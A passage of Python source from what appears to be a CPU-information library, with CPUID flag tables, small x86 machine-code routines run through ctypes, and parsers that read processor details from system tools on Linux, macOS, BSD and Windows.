'pqm' : is_bit_set(ebx, 12),
#'FPU CS and FPU DS deprecated' : is_bit_set(ebx, 13),
'mpx' : is_bit_set(ebx, 14),
'pqe' : is_bit_set(ebx, 15),
'avx512f' : is_bit_set(ebx, 16),
'avx512dq' : is_bit_set(ebx, 17),
'rdseed' : is_bit_set(ebx, 18),
'adx' : is_bit_set(ebx, 19),
'smap' : is_bit_set(ebx, 20),
'avx512ifma' : is_bit_set(ebx, 21),
'pcommit' : is_bit_set(ebx, 22),
'clflushopt' : is_bit_set(ebx, 23),
'clwb' : is_bit_set(ebx, 24),
'intel_pt' : is_bit_set(ebx, 25),
'avx512pf' : is_bit_set(ebx, 26),
'avx512er' : is_bit_set(ebx, 27),
'avx512cd' : is_bit_set(ebx, 28),
'sha' : is_bit_set(ebx, 29),
'avx512bw' : is_bit_set(ebx, 30),
'avx512vl' : is_bit_set(ebx, 31),
'prefetchwt1' : is_bit_set(ecx, 0),
'avx512vbmi' : is_bit_set(ecx, 1),
'umip' : is_bit_set(ecx, 2),
'pku' : is_bit_set(ecx, 3),
'ospke' : is_bit_set(ecx, 4),
#'reserved' : is_bit_set(ecx, 5),
'avx512vbmi2' : is_bit_set(ecx, 6),
#'reserved' : is_bit_set(ecx, 7),
'gfni' : is_bit_set(ecx, 8),
'vaes' : is_bit_set(ecx, 9),
'vpclmulqdq' : is_bit_set(ecx, 10),
'avx512vnni' : is_bit_set(ecx, 11),
'avx512bitalg' : is_bit_set(ecx, 12),
#'reserved' : is_bit_set(ecx, 13),
'avx512vpopcntdq' : is_bit_set(ecx, 14),
#'reserved' : is_bit_set(ecx, 15),
#'reserved' : is_bit_set(ecx, 16),
#'mpx0' : is_bit_set(ecx, 17),
#'mpx1' : is_bit_set(ecx, 18),
#'mpx2' : is_bit_set(ecx, 19),
#'mpx3' : is_bit_set(ecx, 20),
#'mpx4' : is_bit_set(ecx, 21),
'rdpid' : is_bit_set(ecx, 22),
#'reserved' : is_bit_set(ecx, 23),
#'reserved' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
#'reserved' : is_bit_set(ecx, 26),
#'reserved' : is_bit_set(ecx, 27),
#'reserved' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
'sgx_lc' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000001h:_Extended_Processor_Info_and_Feature_Bits
if max_extension_support >= 0x80000001:
# EBX
ebx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
b"\xB8\x01\x00\x00\x80" # mov ax,0x80000001
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# Get the extended CPU flags
extended_flags = {
'fpu' : is_bit_set(ebx, 0),
'vme' : is_bit_set(ebx, 1),
'de' : is_bit_set(ebx, 2),
'pse' : is_bit_set(ebx, 3),
'tsc' : is_bit_set(ebx, 4),
'msr' : is_bit_set(ebx, 5),
'pae' : is_bit_set(ebx, 6),
'mce' : is_bit_set(ebx, 7),
'cx8' : is_bit_set(ebx, 8),
'apic' : is_bit_set(ebx, 9),
#'reserved' : is_bit_set(ebx, 10),
'syscall' : is_bit_set(ebx, 11),
'mtrr' : is_bit_set(ebx, 12),
'pge' : is_bit_set(ebx, 13),
'mca' : is_bit_set(ebx, 14),
'cmov' : is_bit_set(ebx, 15),
'pat' : is_bit_set(ebx, 16),
'pse36' : is_bit_set(ebx, 17),
#'reserved' : is_bit_set(ebx, 18),
'mp' : is_bit_set(ebx, 19),
'nx' : is_bit_set(ebx, 20),
#'reserved' : is_bit_set(ebx, 21),
'mmxext' : is_bit_set(ebx, 22),
'mmx' : is_bit_set(ebx, 23),
'fxsr' : is_bit_set(ebx, 24),
'fxsr_opt' : is_bit_set(ebx, 25),
'pdpe1gp' : is_bit_set(ebx, 26),
'rdtscp' : is_bit_set(ebx, 27),
#'reserved' : is_bit_set(ebx, 28),
'lm' : is_bit_set(ebx, 29),
'3dnowext' : is_bit_set(ebx, 30),
'3dnow' : is_bit_set(ebx, 31),
'lahf_lm' : is_bit_set(ecx, 0),
'cmp_legacy' : is_bit_set(ecx, 1),
'svm' : is_bit_set(ecx, 2),
'extapic' : is_bit_set(ecx, 3),
'cr8_legacy' : is_bit_set(ecx, 4),
'abm' : is_bit_set(ecx, 5),
'sse4a' : is_bit_set(ecx, 6),
'misalignsse' : is_bit_set(ecx, 7),
'3dnowprefetch' : is_bit_set(ecx, 8),
'osvw' : is_bit_set(ecx, 9),
'ibs' : is_bit_set(ecx, 10),
'xop' : is_bit_set(ecx, 11),
'skinit' : is_bit_set(ecx, 12),
'wdt' : is_bit_set(ecx, 13),
#'reserved' : is_bit_set(ecx, 14),
'lwp' : is_bit_set(ecx, 15),
'fma4' : is_bit_set(ecx, 16),
'tce' : is_bit_set(ecx, 17),
#'reserved' : is_bit_set(ecx, 18),
'nodeid_msr' : is_bit_set(ecx, 19),
#'reserved' : is_bit_set(ecx, 20),
'tbm' : is_bit_set(ecx, 21),
'topoext' : is_bit_set(ecx, 22),
'perfctr_core' : is_bit_set(ecx, 23),
'perfctr_nb' : is_bit_set(ecx, 24),
#'reserved' : is_bit_set(ecx, 25),
'dbx' : is_bit_set(ecx, 26),
'perftsc' : is_bit_set(ecx, 27),
'pci_l2i' : is_bit_set(ecx, 28),
#'reserved' : is_bit_set(ecx, 29),
#'reserved' : is_bit_set(ecx, 30),
#'reserved' : is_bit_set(ecx, 31)
}
# Get a list of only the flags that are true
extended_flags = [k for k, v in extended_flags.items() if v]
flags += extended_flags
flags.sort()
return flags
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000002h.2C80000003h.2C80000004h:_Processor_Brand_String
def get_processor_brand(self, max_extension_support):
processor_brand = ""
# Processor brand string
if max_extension_support >= 0x80000004:
instructions = [
b"\xB8\x02\x00\x00\x80", # mov ax,0x80000002
b"\xB8\x03\x00\x00\x80", # mov ax,0x80000003
b"\xB8\x04\x00\x00\x80" # mov ax,0x80000004
]
for instruction in instructions:
# EAX
eax = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC0" # mov ax,ax
b"\xC3" # ret
)
# EBX
ebx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD8" # mov ax,bx
b"\xC3" # ret
)
# ECX
ecx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# EDX
edx = self._run_asm(
instruction, # mov ax,0x8000000?
b"\x0f\xa2" # cpuid
b"\x89\xD0" # mov ax,dx
b"\xC3" # ret
)
# Combine each of the 4 bytes in each register into the string
for reg in [eax, ebx, ecx, edx]:
for n in [0, 8, 16, 24]:
processor_brand += chr((reg >> n) & 0xFF)
# Strip off any trailing NULL terminators and white space
processor_brand = processor_brand.strip("\0").strip()
return processor_brand
# http://en.wikipedia.org/wiki/CPUID#EAX.3D80000006h:_Extended_L2_Cache_Features
def get_cache(self, max_extension_support):
cache_info = {}
# Just return if the cache feature is not supported
if max_extension_support < 0x80000006:
return cache_info
# ECX
ecx = self._run_asm(
b"\xB8\x06\x00\x00\x80" # mov ax,0x80000006
b"\x0f\xa2" # cpuid
b"\x89\xC8" # mov ax,cx
b"\xC3" # ret
)
# ECX[31:16] = L2 size in KB, ECX[15:12] = associativity, ECX[7:0] = line size in bytes
cache_info = {
'size_kb' : (ecx >> 16) & 0xFFFF,
'line_size_b' : ecx & 0xFF,
'associativity' : (ecx >> 12) & 0xF
}
return cache_info
def get_ticks(self):
retval = None
if DataSource.bits == '32bit':
# Works on x86_32
restype = None
argtypes = (ctypes.POINTER(ctypes.c_uint), ctypes.POINTER(ctypes.c_uint))
get_ticks_x86_32, address = self._asm_func(restype, argtypes,
[
b"\x55", # push bp
b"\x89\xE5", # mov bp,sp
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x8B\x5D\x08", # mov bx,[di+0x8]
b"\x8B\x4D\x0C", # mov cx,[di+0xc]
b"\x89\x13", # mov [bp+di],dx
b"\x89\x01", # mov [bx+di],ax
b"\x5D", # pop bp
b"\xC3" # ret
]
)
high = ctypes.c_uint32(0)
low = ctypes.c_uint32(0)
get_ticks_x86_32(ctypes.byref(high), ctypes.byref(low))
retval = ((high.value << 32) & 0xFFFFFFFF00000000) | low.value
elif DataSource.bits == '64bit':
# Works on x86_64
restype = ctypes.c_uint64
argtypes = ()
get_ticks_x86_64, address = self._asm_func(restype, argtypes,
[
b"\x48", # dec ax
b"\x31\xC0", # xor ax,ax
b"\x0F\xA2", # cpuid
b"\x0F\x31", # rdtsc
b"\x48", # dec ax
b"\xC1\xE2\x20", # shl dx,byte 0x20
b"\x48", # dec ax
b"\x09\xD0", # or ax,dx
b"\xC3", # ret
]
)
retval = get_ticks_x86_64()
return retval
def get_raw_hz(self):
start = self.get_ticks()
time.sleep(1)
end = self.get_ticks()
ticks = (end - start)
return ticks
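# Because get_raw_hz sleeps exactly one second between the two reads, the tick
# delta approximates the CPU clock in Hz (TSC-based, so only an estimate).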
def _actual_get_cpu_info_from_cpuid(queue):
'''
Warning! This function has the potential to crash the Python runtime.
Do not call it directly. Use the _get_cpu_info_from_cpuid function instead.
It will safely call this function in another process.
'''
# Pipe all output to nothing
sys.stdout = open(os.devnull, 'w')
sys.stderr = open(os.devnull, 'w')
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Report {} (via the queue) if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
queue.put(obj_to_b64({}))
return
# Report {} (via the queue) if SE Linux is in enforcing mode
cpuid = CPUID()
if cpuid.is_selinux_enforcing:
queue.put(obj_to_b64({}))
return
# Get the cpu info from the CPUID register
max_extension_support = cpuid.get_max_extension_support()
cache_info = cpuid.get_cache(max_extension_support)
info = cpuid.get_info()
processor_brand = cpuid.get_processor_brand(max_extension_support)
# Get the Hz and scale
hz_actual = cpuid.get_raw_hz()
hz_actual = to_hz_string(hz_actual)
# Get the Hz and scale
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
info = {
'vendor_id' : cpuid.get_vendor_id(),
'hardware' : '',
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_info['size_kb']),
'l2_cache_line_size' : cache_info['line_size_b'],
'l2_cache_associativity' : hex(cache_info['associativity']),
'stepping' : info['stepping'],
'model' : info['model'],
'family' : info['family'],
'processor_type' : info['processor_type'],
'extended_model' : info['extended_model'],
'extended_family' : info['extended_family'],
'flags' : cpuid.get_flags(max_extension_support)
}
info = {k: v for k, v in info.items() if v}
queue.put(obj_to_b64(info))
def _get_cpu_info_from_cpuid():
'''
Returns the CPU info gathered by querying the X86 cpuid register in a new process.
Returns {} on non X86 cpus.
Returns {} if SELinux is in enforcing mode.
'''
from multiprocessing import Process, Queue
# Return {} if can't cpuid
if not DataSource.can_cpuid:
return {}
# Get the CPU arch and bits
arch, bits = parse_arch(DataSource.raw_arch_string)
# Return {} if this is not an X86 CPU
if not arch in ['X86_32', 'X86_64']:
return {}
try:
# Start running the function in a subprocess
queue = Queue()
p = Process(target=_actual_get_cpu_info_from_cpuid, args=(queue,))
p.start()
# Wait for the process to end, while it is still alive
while p.is_alive():
p.join(0)
# Return {} if it failed
if p.exitcode != 0:
return {}
# Return the result, only if there is something to read
if not queue.empty():
output = queue.get()
return b64_to_obj(output)
except:
pass
# Return {} if everything failed
return {}
def _get_cpu_info_from_proc_cpuinfo():
'''
Returns the CPU info gathered from /proc/cpuinfo.
Returns {} if /proc/cpuinfo is not found.
'''
try:
# Just return {} if there is no cpuinfo
if not DataSource.has_proc_cpuinfo():
return {}
returncode, output = DataSource.cat_proc_cpuinfo()
if returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, '', 'vendor_id', 'vendor id', 'vendor')
processor_brand = _get_field(True, output, None, None, 'model name','cpu', 'processor')
cache_size = _get_field(False, output, None, '', 'cache size')
stepping = _get_field(False, output, int, 0, 'stepping')
model = _get_field(False, output, int, 0, 'model')
family = _get_field(False, output, int, 0, 'cpu family')
hardware = _get_field(False, output, None, '', 'Hardware')
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
# Convert from MHz string to Hz
hz_actual = _get_field(False, output, None, '', 'cpu MHz', 'cpu speed', 'clock')
hz_actual = hz_actual.lower().rstrip('mhz').strip()
hz_actual = to_hz_string(hz_actual)
# Convert from GHz/MHz string to Hz
scale, hz_advertised = (0, None)
try:
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
except Exception:
pass
info = {
'hardware' : hardware,
'brand' : processor_brand,
'l3_cache_size' : to_friendly_bytes(cache_size),
'flags' : flags,
'vendor_id' : vendor_id,
'stepping' : stepping,
'model' : model,
'family' : family,
}
# Make the Hz the same for actual and advertised if missing any
if not hz_advertised or hz_advertised == '0.0':
hz_advertised = hz_actual
scale = 6
elif not hz_actual or hz_actual == '0.0':
hz_actual = hz_advertised
# Add the Hz if there is one
if to_raw_hz(hz_advertised, scale) > (0, 0):
info['hz_advertised'] = to_friendly_hz(hz_advertised, scale)
info['hz_advertised_raw'] = to_raw_hz(hz_advertised, scale)
if to_raw_hz(hz_actual, scale) > (0, 0):
info['hz_actual'] = to_friendly_hz(hz_actual, 6)
info['hz_actual_raw'] = to_raw_hz(hz_actual, 6)
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_cpufreq_info():
'''
Returns the CPU info gathered from cpufreq-info.
Returns {} if cpufreq-info is not found.
'''
try:
scale, hz_brand = 1, '0.0'
if not DataSource.has_cpufreq_info():
return {}
returncode, output = DataSource.cpufreq_info()
if returncode != 0:
return {}
hz_brand = output.split('current CPU frequency is')[1].split('\n')[0]
i = hz_brand.find('Hz')
assert(i != -1)
hz_brand = hz_brand[0 : i+2].strip().lower()
if hz_brand.endswith('mhz'):
scale = 6
elif hz_brand.endswith('ghz'):
scale = 9
hz_brand = hz_brand.rstrip('mhz').rstrip('ghz').strip()
hz_brand = to_hz_string(hz_brand)
info = {
'hz_advertised' : to_friendly_hz(hz_brand, scale),
'hz_actual' : to_friendly_hz(hz_brand, scale),
'hz_advertised_raw' : to_raw_hz(hz_brand, scale),
'hz_actual_raw' : to_raw_hz(hz_brand, scale),
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_lscpu():
'''
Returns the CPU info gathered from lscpu.
Returns {} if lscpu is not found.
'''
try:
if not DataSource.has_lscpu():
return {}
returncode, output = DataSource.lscpu()
if returncode != 0:
return {}
info = {}
new_hz = _get_field(False, output, None, None, 'CPU max MHz', 'CPU MHz')
if new_hz:
new_hz = to_hz_string(new_hz)
scale = 6
info['hz_advertised'] = to_friendly_hz(new_hz, scale)
info['hz_actual'] = to_friendly_hz(new_hz, scale)
info['hz_advertised_raw'] = to_raw_hz(new_hz, scale)
info['hz_actual_raw'] = to_raw_hz(new_hz, scale)
vendor_id = _get_field(False, output, None, None, 'Vendor ID')
if vendor_id:
info['vendor_id'] = vendor_id
brand = _get_field(False, output, None, None, 'Model name')
if brand:
info['brand'] = brand
family = _get_field(False, output, None, None, 'CPU family')
if family and family.isdigit():
info['family'] = int(family)
stepping = _get_field(False, output, None, None, 'Stepping')
if stepping and stepping.isdigit():
info['stepping'] = int(stepping)
model = _get_field(False, output, None, None, 'Model')
if model and model.isdigit():
info['model'] = int(model)
l1_data_cache_size = _get_field(False, output, None, None, 'L1d cache')
if l1_data_cache_size:
info['l1_data_cache_size'] = to_friendly_bytes(l1_data_cache_size)
l1_instruction_cache_size = _get_field(False, output, None, None, 'L1i cache')
if l1_instruction_cache_size:
info['l1_instruction_cache_size'] = to_friendly_bytes(l1_instruction_cache_size)
l2_cache_size = _get_field(False, output, None, None, 'L2 cache')
if l2_cache_size:
info['l2_cache_size'] = to_friendly_bytes(l2_cache_size)
l3_cache_size = _get_field(False, output, None, None, 'L3 cache')
if l3_cache_size:
info['l3_cache_size'] = to_friendly_bytes(l3_cache_size)
# Flags
flags = _get_field(False, output, None, None, 'flags', 'Features')
if flags:
flags = flags.split()
flags.sort()
info['flags'] = flags
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_dmesg():
'''
Returns the CPU info gathered from dmesg.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no dmesg
if not DataSource.has_dmesg():
return {}
# If dmesg fails return {}
returncode, output = DataSource.dmesg_a()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
# https://openpowerfoundation.org/wp-content/uploads/2016/05/LoPAPR_DRAFT_v11_24March2016_cmt1.pdf
# page 767
def _get_cpu_info_from_ibm_pa_features():
'''
Returns the CPU info gathered from lsprop /proc/device-tree/cpus/*/ibm,pa-features
Returns {} if lsprop is not found or ibm,pa-features does not have the desired info.
'''
try:
# Just return {} if there is no lsprop
if not DataSource.has_ibm_pa_features():
return {}
# If ibm,pa-features fails return {}
returncode, output = DataSource.ibm_pa_features()
if output == None or returncode != 0:
return {}
# Filter out invalid characters from output
value = output.split("ibm,pa-features")[1].lower()
value = [s for s in value if s in list('0123456789abcfed')]
value = ''.join(value)
# Get data converted to Uint32 chunks
left = int(value[0 : 8], 16)
right = int(value[8 : 16], 16)
# Get the CPU flags
flags = {
# Byte 0
'mmu' : is_bit_set(left, 0),
'fpu' : is_bit_set(left, 1),
'slb' : is_bit_set(left, 2),
'run' : is_bit_set(left, 3),
#'reserved' : is_bit_set(left, 4),
'dabr' : is_bit_set(left, 5),
'ne' : is_bit_set(left, 6),
'wtr' : is_bit_set(left, 7),
# Byte 1
'mcr' : is_bit_set(left, 8),
'dsisr' : is_bit_set(left, 9),
'lp' : is_bit_set(left, 10),
'ri' : is_bit_set(left, 11),
'dabrx' : is_bit_set(left, 12),
'sprg3' : is_bit_set(left, 13),
'rislb' : is_bit_set(left, 14),
'pp' : is_bit_set(left, 15),
# Byte 2
'vpm' : is_bit_set(left, 16),
'dss_2.05' : is_bit_set(left, 17),
#'reserved' : is_bit_set(left, 18),
'dar' : is_bit_set(left, 19),
#'reserved' : is_bit_set(left, 20),
'ppr' : is_bit_set(left, 21),
'dss_2.02' : is_bit_set(left, 22),
'dss_2.06' : is_bit_set(left, 23),
# Byte 3
'lsd_in_dscr' : is_bit_set(left, 24),
'ugr_in_dscr' : is_bit_set(left, 25),
#'reserved' : is_bit_set(left, 26),
#'reserved' : is_bit_set(left, 27),
#'reserved' : is_bit_set(left, 28),
#'reserved' : is_bit_set(left, 29),
#'reserved' : is_bit_set(left, 30),
#'reserved' : is_bit_set(left, 31),
# Byte 4
'sso_2.06' : is_bit_set(right, 0),
#'reserved' : is_bit_set(right, 1),
#'reserved' : is_bit_set(right, 2),
#'reserved' : is_bit_set(right, 3),
#'reserved' : is_bit_set(right, 4),
#'reserved' : is_bit_set(right, 5),
#'reserved' : is_bit_set(right, 6),
#'reserved' : is_bit_set(right, 7),
# Byte 5
'le' : is_bit_set(right, 8),
'cfar' : is_bit_set(right, 9),
'eb' : is_bit_set(right, 10),
'lsq_2.07' : is_bit_set(right, 11),
#'reserved' : is_bit_set(right, 12),
#'reserved' : is_bit_set(right, 13),
#'reserved' : is_bit_set(right, 14),
#'reserved' : is_bit_set(right, 15),
# Byte 6
'dss_2.07' : is_bit_set(right, 16),
#'reserved' : is_bit_set(right, 17),
#'reserved' : is_bit_set(right, 18),
#'reserved' : is_bit_set(right, 19),
#'reserved' : is_bit_set(right, 20),
#'reserved' : is_bit_set(right, 21),
#'reserved' : is_bit_set(right, 22),
#'reserved' : is_bit_set(right, 23),
# Byte 7
#'reserved' : is_bit_set(right, 24),
#'reserved' : is_bit_set(right, 25),
#'reserved' : is_bit_set(right, 26),
#'reserved' : is_bit_set(right, 27),
#'reserved' : is_bit_set(right, 28),
#'reserved' : is_bit_set(right, 29),
#'reserved' : is_bit_set(right, 30),
#'reserved' : is_bit_set(right, 31),
}
# Get a list of only the flags that are true
flags = [k for k, v in flags.items() if v]
flags.sort()
info = {
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_cat_var_run_dmesg_boot():
'''
Returns the CPU info gathered from /var/run/dmesg.boot.
Returns {} if dmesg is not found or does not have the desired info.
'''
# Just return {} if there is no /var/run/dmesg.boot
if not DataSource.has_var_run_dmesg_boot():
return {}
# If dmesg.boot fails return {}
returncode, output = DataSource.cat_var_run_dmesg_boot()
if output == None or returncode != 0:
return {}
return _parse_dmesg_output(output)
def _get_cpu_info_from_sysctl():
'''
Returns the CPU info gathered from sysctl.
Returns {} if sysctl is not found.
'''
try:
# Just return {} if there is no sysctl
if not DataSource.has_sysctl():
return {}
# If sysctl fails return {}
returncode, output = DataSource.sysctl_machdep_cpu_hw_cpufrequency()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = _get_field(False, output, None, None, 'machdep.cpu.vendor')
processor_brand = _get_field(True, output, None, None, 'machdep.cpu.brand_string')
cache_size = _get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = _get_field(False, output, int, 0, 'machdep.cpu.stepping')
model = _get_field(False, output, int, 0, 'machdep.cpu.model')
family = _get_field(False, output, int, 0, 'machdep.cpu.family')
# Flags
flags = _get_field(False, output, None, '', 'machdep.cpu.features').lower().split()
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.leaf7_features').lower().split())
flags.extend(_get_field(False, output, None, '', 'machdep.cpu.extfeatures').lower().split())
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = _get_field(False, output, None, None, 'hw.cpufrequency')
hz_actual = to_hz_string(hz_actual)
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, 0),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, 0),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
info = _get_cpu_info_from_sysinfo_v1()
info.update(_get_cpu_info_from_sysinfo_v2())
return info
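# Note: values from the v2 parser win, since dict.update overwrites any keys
# that both parsers return.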
def _get_cpu_info_from_sysinfo_v1():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
stepping = int(output.split(', stepping ')[1].split(',')[0].strip())
model = int(output.split(', model ')[1].split(',')[0].strip())
family = int(output.split(', family ')[1].split(',')[0].strip())
# Flags
flags = []
for line in output.split('\n'):
if line.startswith('\t\t'):
for flag in line.strip().lower().split():
flags.append(flag)
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_sysinfo_v2():
'''
Returns the CPU info gathered from sysinfo.
Returns {} if sysinfo is not found.
'''
try:
# Just return {} if there is no sysinfo
if not DataSource.has_sysinfo():
return {}
# If sysinfo fails return {}
returncode, output = DataSource.sysinfo_cpu()
if output == None or returncode != 0:
return {}
# Various fields
vendor_id = '' #_get_field(False, output, None, None, 'CPU #0: ')
processor_brand = output.split('CPU #0: "')[1].split('"\n')[0]
cache_size = '' #_get_field(False, output, None, None, 'machdep.cpu.cache.size')
signature = output.split('Signature:')[1].split('\n')[0].strip()
#
stepping = int(signature.split('stepping ')[1].split(',')[0].strip())
model = int(signature.split('model ')[1].split(',')[0].strip())
family = int(signature.split('family ')[1].split(',')[0].strip())
# Flags
def get_subsection_flags(output):
retval = []
for line in output.split('\n')[1:]:
if not line.startswith(' '): break
for entry in line.strip().lower().split(' '):
retval.append(entry)
return retval
flags = get_subsection_flags(output.split('Features: ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x00000001): ')[1]) + \
get_subsection_flags(output.split('Extended Features (0x80000001): ')[1])
flags.sort()
# Convert from GHz/MHz string to Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
hz_actual = hz_advertised
info = {
'vendor_id' : vendor_id,
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale),
'hz_actual' : to_friendly_hz(hz_actual, scale),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale),
'hz_actual_raw' : to_raw_hz(hz_actual, scale),
'l2_cache_size' : to_friendly_bytes(cache_size),
'stepping' : stepping,
'model' : model,
'family' : family,
'flags' : flags
}
info = {k: v for k, v in info.items() if v}
return info
except:
return {}
def _get_cpu_info_from_wmic():
'''
Returns the CPU info gathered from WMI.
Returns {} if not on Windows, or wmic is not installed.
'''
try:
# Just return {} if not Windows or there is no wmic
if not DataSource.is_windows or not DataSource.has_wmic():
return {}
returncode, output = DataSource.wmic_cpu()
if output == None or returncode != 0:
return {}
# Break the list into key values pairs
value = output.split("\n")
value = [s.rstrip().split('=') for s in value if '=' in s]
value = {k: v for k, v in value if v}
# Get the advertised MHz
processor_brand = value.get('Name')
scale_advertised, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the actual MHz
hz_actual = value.get('CurrentClockSpeed')
scale_actual = 6
if hz_actual:
hz_actual = to_hz_string(hz_actual)
# Get cache sizes
l2_cache_size = value.get('L2CacheSize')
if l2_cache_size:
l2_cache_size = l2_cache_size + ' KB'
l3_cache_size = value.get('L3CacheSize')
if l3_cache_size:
l3_cache_size = l3_cache_size + ' KB'
# Get family, model, and stepping
family, model, stepping = '', '', ''
description = value.get('Description') or value.get('Caption')
entries = description.split(' ')
if 'Family' in entries and entries.index('Family') < len(entries)-1:
i = entries.index('Family')
family = int(entries[i + 1])
if 'Model' in entries and entries.index('Model') < len(entries)-1:
i = entries.index('Model')
model = int(entries[i + 1])
if 'Stepping' in entries and entries.index('Stepping') < len(entries)-1:
i = entries.index('Stepping')
stepping = int(entries[i + 1])
info = {
'vendor_id' : value.get('Manufacturer'),
'brand' : processor_brand,
'hz_advertised' : to_friendly_hz(hz_advertised, scale_advertised),
'hz_actual' : to_friendly_hz(hz_actual, scale_actual),
'hz_advertised_raw' : to_raw_hz(hz_advertised, scale_advertised),
'hz_actual_raw' : to_raw_hz(hz_actual, scale_actual),
'l2_cache_size' : l2_cache_size,
'l3_cache_size' : l3_cache_size,
'stepping' : stepping,
'model' : model,
'family' : family,
}
info = {k: v for k, v in info.items() if v}
return info
except:
#raise # NOTE: To have this throw on error, uncomment this line
return {}
def _get_cpu_info_from_registry():
'''
FIXME: Is missing many of the newer CPU flags like sse3
Returns the CPU info gathered from the Windows Registry.
Returns {} if not on Windows.
'''
try:
# Just return {} if not on Windows
if not DataSource.is_windows:
return {}
# Get the CPU name
processor_brand = DataSource.winreg_processor_brand()
# Get the CPU vendor id
vendor_id = DataSource.winreg_vendor_id()
# Get the CPU arch and bits
raw_arch_string = DataSource.winreg_raw_arch_string()
arch, bits = parse_arch(raw_arch_string)
# Get the actual CPU Hz
hz_actual = DataSource.winreg_hz_actual()
hz_actual = to_hz_string(hz_actual)
# Get the advertised CPU Hz
scale, hz_advertised = _get_hz_string_from_brand(processor_brand)
# Get the CPU features
feature_bits = DataSource.winreg_feature_bits()
def is_set(bit):
mask = 0x80000000 >> bit
retval = mask & feature_bits > 0
return retval
# http://en.wikipedia.org/wiki/CPUID
# http://unix.stackexchange.com/questions/43539/what-do-the-flags-in-proc-cpuinfo-mean
# http://www.lohninger.com/helpcsuite/public_constants_cpuid.htm
flags = {
'fpu' : is_set(0), # Floating Point Unit
'vme' : is_set(1), # V86 Mode Extensions
'de' : is_set(2), # Debug Extensions - I/O breakpoints supported
'pse' : is_set(3), # Page Size Extensions (4 MB pages supported)
'tsc' : is_set(4), # Time Stamp Counter and RDTSC instruction are available
'msr' : is_set(5), # Model Specific Registers
'pae' : is_set(6), # Physical Address Extensions (36 bit address, 2MB pages)
'mce' : is_set(7), # Machine Check Exception supported
'cx8' : is_set(8), # Compare Exchange Eight Byte instruction available
